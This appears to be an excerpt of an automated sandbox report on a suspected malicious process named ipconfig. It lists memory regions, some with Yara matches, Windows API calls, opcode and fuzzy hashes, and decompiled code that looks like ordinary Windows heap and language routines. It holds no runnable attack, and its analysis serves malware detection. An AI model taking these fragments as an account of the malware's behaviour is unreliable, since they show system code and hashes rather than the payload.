              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateInternalProcess
              • String ID:
              • API String ID: 2186235152-0
              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction ID: 06812df190dee9481eeca5b3287c544fdf5b130813a371f34076e9e6f7926397
              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
              • Instruction Fuzzy Hash: 3201AFB2210108ABCB58DF89DC84EEB77ADAF8C754F158258BA0D97240C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0CCE0,?,?), ref: 02A1745C
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
              • Instruction ID: 352ebec08df666fdda7718ca3ac0a3dbc3a757ba407801ea64e8de5943a94e03
              • Opcode Fuzzy Hash: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
              • Instruction Fuzzy Hash: 45E06D333803143AE6206599AC42FA7B69C8B81B30F140026FA0DEA2C0D995F80146A4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02A0CCE0,?,?), ref: 02A1745C
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateThread
              • String ID:
              • API String ID: 2422867632-0
              • Opcode ID: b5ca66d23bc9a748c421fc1532e805046b5053a28119dd931a3acf4bdb19796f
              • Instruction ID: 8dd03bd736f0dab1481dd0c60bdedfa136bae573418eca271d39ffeae2b70dc3
              • Opcode Fuzzy Hash: b5ca66d23bc9a748c421fc1532e805046b5053a28119dd931a3acf4bdb19796f
              • Instruction Fuzzy Hash: CCF0E5327D17203AD7316A5C8C43FA7B79D9B81F20F150125FA48EB2C1DEA5F80146E5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 8871f57e5913fddf161357be4db82a0c479f3acd76ab6255e8fc0548982bc334
              • Instruction ID: 5b6a99c9e8a2c2c059b209349b930acfe1bde1fc7cb0d0f6d2fecc595dcdd123
              • Opcode Fuzzy Hash: 8871f57e5913fddf161357be4db82a0c479f3acd76ab6255e8fc0548982bc334
              • Instruction Fuzzy Hash: 41E01AB5200208AFDB14DF54CC84EE737A9AF89290F058194FE4C5B241C930E815CBF1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction ID: 27e5a9dd5d5665ebbc38f813c9f9bd0a194378a43945519785f9ab0b8729ed62
              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
              • Instruction Fuzzy Hash: 36E01AB12002086BDB14DF49CC84EE737ADAF88650F018154BE0C57241C930E814CBF5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(00008003,?,?,02A07C83,?), ref: 02A0D44B
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
              • Instruction ID: a840f31382ffa9fb05afb5917bd47bdc1181cb249b70c9434ed8f9402e502357
              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
              • Instruction Fuzzy Hash: BED05E627903043AEA10BAA49C42F2676C99B44B14F494064F949D62C3DE54E4004561
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 65be4dae1ec5f89ba25da349d1c8ee3fb8f6fb0bd4a1134e4bb356b63c2a945f
              • Instruction ID: e5e609d73a169289c519106e8d24f48ec3d70f5982124f15196c48cc2f1303d6
              • Opcode Fuzzy Hash: 65be4dae1ec5f89ba25da349d1c8ee3fb8f6fb0bd4a1134e4bb356b63c2a945f
              • Instruction Fuzzy Hash: A5B0122270C05814C52211587C50378FB58C7CF222F0001F7E90C811804956142146E2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 0264de00613f9fd16bbf91954a2b6ef18c29299bdaeb6c004a325488835827a9
              • Instruction ID: 513131e9451e859cfb99fde0820738d255e5b6d6193a4cf84a898a0f977b9435
              • Opcode Fuzzy Hash: 0264de00613f9fd16bbf91954a2b6ef18c29299bdaeb6c004a325488835827a9
              • Instruction Fuzzy Hash: 2DB09B71A414C5C5DA11D7B04E08727790477D0745F16D051D1130645B477CC491F6B5
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 02F4B2F3
              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 02F4B484
              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F4B3D6
              • Go determine why that thread has not released the critical section., xrefs: 02F4B3C5
              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 02F4B39B
              • *** Resource timeout (%p) in %ws:%s, xrefs: 02F4B352
              • The instruction at %p tried to %s , xrefs: 02F4B4B6
              • The resource is owned shared by %d threads, xrefs: 02F4B37E
              • *** enter .exr %p for the exception record, xrefs: 02F4B4F1
              • read from, xrefs: 02F4B4AD, 02F4B4B2
              • an invalid address, %p, xrefs: 02F4B4CF
              • a NULL pointer, xrefs: 02F4B4E0
              • This failed because of error %Ix., xrefs: 02F4B446
              • The critical section is owned by thread %p., xrefs: 02F4B3B9
              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 02F4B2DC
              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 02F4B476
              • *** An Access Violation occurred in %ws:%s, xrefs: 02F4B48F
              • The resource is owned exclusively by thread %p, xrefs: 02F4B374
              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 02F4B47D
              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 02F4B53F
              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 02F4B38F
              • *** Inpage error in %ws:%s, xrefs: 02F4B418
              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 02F4B314
              • <unknown>, xrefs: 02F4B27E, 02F4B2D1, 02F4B350, 02F4B399, 02F4B417, 02F4B48E
              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 02F4B323
              • *** then kb to get the faulting stack, xrefs: 02F4B51C
              • The instruction at %p referenced memory at %p., xrefs: 02F4B432
              • write to, xrefs: 02F4B4A6
              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 02F4B305
              • *** enter .cxr %p for the context, xrefs: 02F4B50D
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
              • API String ID: 0-108210295
              • Opcode ID: 3403589e7d8678e2d89259dbb8d1ca7aa2df40df203832859f4451a362f96b50
              • Instruction ID: 94e88511ad64fe80ad40b76cb61bd4ab269121bff0220128777a5e515f3d3bed
              • Opcode Fuzzy Hash: 3403589e7d8678e2d89259dbb8d1ca7aa2df40df203832859f4451a362f96b50
              • Instruction Fuzzy Hash: B0812136E80214BBEB256E15CC45E7B3F26AF47BD9F808044F20D6B266DBA1C401DA72
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 44%
              			E02F51C06() {
              				signed int _t27;
              				char* _t104;
              				char* _t105;
              				intOrPtr _t113;
              				intOrPtr _t115;
              				intOrPtr _t117;
              				intOrPtr _t119;
              				intOrPtr _t120;
              
              				_t105 = 0x2e748a4;
              				_t104 = "HEAP: ";
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E02E9B150();
              				} else {
              					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				_push( *0x2f8589c);
              				E02E9B150("Heap error detected at %p (heap handle %p)\n",  *0x2f858a0);
              				_t27 =  *0x2f85898; // 0x0
              				if(_t27 <= 0xf) {
              					switch( *((intOrPtr*)(_t27 * 4 +  &M02F51E96))) {
              						case 0:
              							_t105 = "heap_failure_internal";
              							goto L21;
              						case 1:
              							goto L21;
              						case 2:
              							goto L21;
              						case 3:
              							goto L21;
              						case 4:
              							goto L21;
              						case 5:
              							goto L21;
              						case 6:
              							goto L21;
              						case 7:
              							goto L21;
              						case 8:
              							goto L21;
              						case 9:
              							goto L21;
              						case 0xa:
              							goto L21;
              						case 0xb:
              							goto L21;
              						case 0xc:
              							goto L21;
              						case 0xd:
              							goto L21;
              						case 0xe:
              							goto L21;
              						case 0xf:
              							goto L21;
              					}
              				}
              				L21:
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E02E9B150();
              				} else {
              					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				_push(_t105);
              				E02E9B150("Error code: %d - %s\n",  *0x2f85898);
              				_t113 =  *0x2f858a4; // 0x0
              				if(_t113 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E02E9B150();
              					} else {
              						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E02E9B150("Parameter1: %p\n",  *0x2f858a4);
              				}
              				_t115 =  *0x2f858a8; // 0x0
              				if(_t115 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E02E9B150();
              					} else {
              						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E02E9B150("Parameter2: %p\n",  *0x2f858a8);
              				}
              				_t117 =  *0x2f858ac; // 0x0
              				if(_t117 != 0) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E02E9B150();
              					} else {
              						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E02E9B150("Parameter3: %p\n",  *0x2f858ac);
              				}
              				_t119 =  *0x2f858b0; // 0x0
              				if(_t119 != 0) {
              					L41:
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push(_t104);
              						E02E9B150();
              					} else {
              						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					_push( *0x2f858b4);
              					E02E9B150("Last known valid blocks: before - %p, after - %p\n",  *0x2f858b0);
              				} else {
              					_t120 =  *0x2f858b4; // 0x0
              					if(_t120 != 0) {
              						goto L41;
              					}
              				}
              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              					_push(_t104);
              					E02E9B150();
              				} else {
              					E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              				}
              				return E02E9B150("Stack trace available at %p\n", 0x2f858c0);
              			}

              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
              • API String ID: 0-2897834094
              • Opcode ID: 823f8e310d3a4b0d5231c818523dd297c0fe07bf7d7ad1a3743c2816e205b6bc
              • Instruction ID: 102ff447e940c5ac06c62cdbaf38aac432c5ef90b4a00901ad2b3eaaad0e06be
              • Opcode Fuzzy Hash: 823f8e310d3a4b0d5231c818523dd297c0fe07bf7d7ad1a3743c2816e205b6bc
              • Instruction Fuzzy Hash: 4461E733AD1158DFD611AB85E849F37B3A5EB05AA470DD42FFB0E5B211C764A840CE1A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E02EA3D34(signed int* __ecx) {
              				signed int* _v8;
              				char _v12;
              				signed int* _v16;
              				signed int* _v20;
              				char _v24;
              				signed int _v28;
              				signed int _v32;
              				char _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int* _v48;
              				signed int* _v52;
              				signed int _v56;
              				signed int _v60;
              				char _v68;
              				signed int _t140;
              				signed int _t161;
              				signed int* _t236;
              				signed int* _t242;
              				signed int* _t243;
              				signed int* _t244;
              				signed int* _t245;
              				signed int _t255;
              				void* _t257;
              				signed int _t260;
              				void* _t262;
              				signed int _t264;
              				void* _t267;
              				signed int _t275;
              				signed int* _t276;
              				short* _t277;
              				signed int* _t278;
              				signed int* _t279;
              				signed int* _t280;
              				short* _t281;
              				signed int* _t282;
              				short* _t283;
              				signed int* _t284;
              				void* _t285;
              
              				_v60 = _v60 | 0xffffffff;
              				_t280 = 0;
              				_t242 = __ecx;
              				_v52 = __ecx;
              				_v8 = 0;
              				_v20 = 0;
              				_v40 = 0;
              				_v28 = 0;
              				_v32 = 0;
              				_v44 = 0;
              				_v56 = 0;
              				_t275 = 0;
              				_v16 = 0;
              				if(__ecx == 0) {
              					_t280 = 0xc000000d;
              					_t140 = 0;
              					L50:
              					 *_t242 =  *_t242 | 0x00000800;
              					_t242[0x13] = _t140;
              					_t242[0x16] = _v40;
              					_t242[0x18] = _v28;
              					_t242[0x14] = _v32;
              					_t242[0x17] = _t275;
              					_t242[0x15] = _v44;
              					_t242[0x11] = _v56;
              					_t242[0x12] = _v60;
              					return _t280;
              				}
              				if(E02EA1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
              					_v56 = 1;
              					if(_v8 != 0) {
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
              					}
              					_v8 = _t280;
              				}
              				if(E02EA1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
              					_v60 =  *_v8;
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
              					_v8 = _t280;
              				}
              				if(E02EA1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
              					L16:
              					if(E02EA1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
              						L28:
              						if(E02EA1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
              							L46:
              							_t275 = _v16;
              							L47:
              							_t161 = 0;
              							L48:
              							if(_v8 != 0) {
              								L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
              							}
              							_t140 = _v20;
              							if(_t140 != 0) {
              								if(_t275 != 0) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
              									_t275 = 0;
              									_v28 = 0;
              									_t140 = _v20;
              								}
              							}
              							goto L50;
              						}
              						_t167 = _v12;
              						_t255 = _v12 + 4;
              						_v44 = _t255;
              						if(_t255 == 0) {
              							_t276 = _t280;
              							_v32 = _t280;
              						} else {
              							_t276 = L02EB4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
              							_t167 = _v12;
              							_v32 = _t276;
              						}
              						if(_t276 == 0) {
              							_v44 = _t280;
              							_t280 = 0xc0000017;
              							goto L46;
              						} else {
              							E02EDF3E0(_t276, _v8, _t167);
              							_v48 = _t276;
              							_t277 = E02EE1370(_t276, 0x2e74e90);
              							_pop(_t257);
              							if(_t277 == 0) {
              								L38:
              								_t170 = _v48;
              								if( *_v48 != 0) {
              									E02EDBB40(0,  &_v68, _t170);
              									if(L02EA43C0( &_v68,  &_v24) != 0) {
              										_t280 =  &(_t280[0]);
              									}
              								}
              								if(_t280 == 0) {
              									_t280 = 0;
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
              									_v44 = 0;
              									_v32 = 0;
              								} else {
              									_t280 = 0;
              								}
              								_t174 = _v8;
              								if(_v8 != 0) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
              								}
              								_v8 = _t280;
              								goto L46;
              							}
              							_t243 = _v48;
              							do {
              								 *_t277 = 0;
              								_t278 = _t277 + 2;
              								E02EDBB40(_t257,  &_v68, _t243);
              								if(L02EA43C0( &_v68,  &_v24) != 0) {
              									_t280 =  &(_t280[0]);
              								}
              								_t243 = _t278;
              								_t277 = E02EE1370(_t278, 0x2e74e90);
              								_pop(_t257);
              							} while (_t277 != 0);
              							_v48 = _t243;
              							_t242 = _v52;
              							goto L38;
              						}
              					}
              					_t191 = _v12;
              					_t260 = _v12 + 4;
              					_v28 = _t260;
              					if(_t260 == 0) {
              						_t275 = _t280;
              						_v16 = _t280;
              					} else {
              						_t275 = L02EB4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
              						_t191 = _v12;
              						_v16 = _t275;
              					}
              					if(_t275 == 0) {
              						_v28 = _t280;
              						_t280 = 0xc0000017;
              						goto L47;
              					} else {
              						E02EDF3E0(_t275, _v8, _t191);
              						_t285 = _t285 + 0xc;
              						_v48 = _t275;
              						_t279 = _t280;
              						_t281 = E02EE1370(_v16, 0x2e74e90);
              						_pop(_t262);
              						if(_t281 != 0) {
              							_t244 = _v48;
              							do {
              								 *_t281 = 0;
              								_t282 = _t281 + 2;
              								E02EDBB40(_t262,  &_v68, _t244);
              								if(L02EA43C0( &_v68,  &_v24) != 0) {
              									_t279 =  &(_t279[0]);
              								}
              								_t244 = _t282;
              								_t281 = E02EE1370(_t282, 0x2e74e90);
              								_pop(_t262);
              							} while (_t281 != 0);
              							_v48 = _t244;
              							_t242 = _v52;
              						}
              						_t201 = _v48;
              						_t280 = 0;
              						if( *_v48 != 0) {
              							E02EDBB40(_t262,  &_v68, _t201);
              							if(L02EA43C0( &_v68,  &_v24) != 0) {
              								_t279 =  &(_t279[0]);
              							}
              						}
              						if(_t279 == 0) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
              							_v28 = _t280;
              							_v16 = _t280;
              						}
              						_t202 = _v8;
              						if(_v8 != 0) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
              						}
              						_v8 = _t280;
              						goto L28;
              					}
              				}
              				_t214 = _v12;
              				_t264 = _v12 + 4;
              				_v40 = _t264;
              				if(_t264 == 0) {
              					_v20 = _t280;
              				} else {
              					_t236 = L02EB4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
              					_t280 = _t236;
              					_v20 = _t236;
              					_t214 = _v12;
              				}
              				if(_t280 == 0) {
              					_t161 = 0;
              					_t280 = 0xc0000017;
              					_v40 = 0;
              					goto L48;
              				} else {
              					E02EDF3E0(_t280, _v8, _t214);
              					_t285 = _t285 + 0xc;
              					_v48 = _t280;
              					_t283 = E02EE1370(_t280, 0x2e74e90);
              					_pop(_t267);
              					if(_t283 != 0) {
              						_t245 = _v48;
              						do {
              							 *_t283 = 0;
              							_t284 = _t283 + 2;
              							E02EDBB40(_t267,  &_v68, _t245);
              							if(L02EA43C0( &_v68,  &_v24) != 0) {
              								_t275 = _t275 + 1;
              							}
              							_t245 = _t284;
              							_t283 = E02EE1370(_t284, 0x2e74e90);
              							_pop(_t267);
              						} while (_t283 != 0);
              						_v48 = _t245;
              						_t242 = _v52;
              					}
              					_t224 = _v48;
              					_t280 = 0;
              					if( *_v48 != 0) {
              						E02EDBB40(_t267,  &_v68, _t224);
              						if(L02EA43C0( &_v68,  &_v24) != 0) {
              							_t275 = _t275 + 1;
              						}
              					}
              					if(_t275 == 0) {
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
              						_v40 = _t280;
              						_v20 = _t280;
              					}
              					_t225 = _v8;
              					if(_v8 != 0) {
              						L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
              					}
              					_v8 = _t280;
              					goto L16;
              				}
              			}
              0x02ea3ddd
              0x02ea3de0
              0x02ea3de5
              0x02ef8245
              0x02ea3deb
              0x02ea3df7
              0x02ea3dfc
              0x02ea3dfe
              0x02ea3e01
              0x02ea3e01
              0x02ea3e06
              0x02ef824d
              0x02ef824f
              0x02ef8254
              0x00000000
              0x02ea3e0c
              0x02ea3e11
              0x02ea3e16
              0x02ea3e19
              0x02ea3e29
              0x02ea3e2c
              0x02ea3e2f
              0x02ef825c
              0x02ef825f
              0x02ef8261
              0x02ef8264
              0x02ef826c
              0x02ef8280
              0x02ef8282
              0x02ef8282
              0x02ef8289
              0x02ef8290
              0x02ef8293
              0x02ef8294
              0x02ef8298
              0x02ef829b
              0x02ef829b
              0x02ea3e35
              0x02ea3e38
              0x02ea3e3d
              0x02ea3e44
              0x02ea3e58
              0x02ef82a3
              0x02ef82a3
              0x02ea3e58
              0x02ea3e60
              0x02ea3e6f
              0x02ea3e74
              0x02ea3e77
              0x02ea3e77
              0x02ea3e7a
              0x02ea3e7f
              0x02ea3e8c
              0x02ea3e8c
              0x02ea3e91
              0x00000000
              0x02ea3e91

              Strings
              • WindowsExcludedProcs, xrefs: 02EA3D6F
              • Kernel-MUI-Language-Allowed, xrefs: 02EA3DC0
              • Kernel-MUI-Language-SKU, xrefs: 02EA3F70
              • Kernel-MUI-Number-Allowed, xrefs: 02EA3D8C
              • Kernel-MUI-Language-Disallowed, xrefs: 02EA3E97
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 6ffc033b15b0d47028036dd045dfd8c5a44bc36de4366bcfd2300d69cc4fdd65
              • Instruction ID: 5d45ea1f2940bd73d3ee83c0cc5aa64ea3c90d9bf37215acf07c6c9a39cfd62c
              • Opcode Fuzzy Hash: 6ffc033b15b0d47028036dd045dfd8c5a44bc36de4366bcfd2300d69cc4fdd65
              • Instruction Fuzzy Hash: BEF15E72D80618EFCB11DF98C990AEFBBB9FF48754F15906AE505AB250D770AE01CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 29%
              			E02E940E1(void* __edx) {
              				void* _t19;
              				void* _t29;
              
              				_t28 = _t19;
              				_t29 = __edx;
              				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
              						_push("HEAP: ");
              						E02E9B150();
              					} else {
              						E02E9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
              					}
              					E02E9B150("Invalid heap signature for heap at %p", _t28);
              					if(_t29 != 0) {
              						E02E9B150(", passed to %s", _t29);
              					}
              					_push("\n");
              					E02E9B150();
              					if( *((char*)( *[fs:0x30] + 2)) != 0) {
              						 *0x2f86378 = 1;
              						asm("int3");
              						 *0x2f86378 = 0;
              					}
              					return 0;
              				}
              				return 1;
              			}






              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
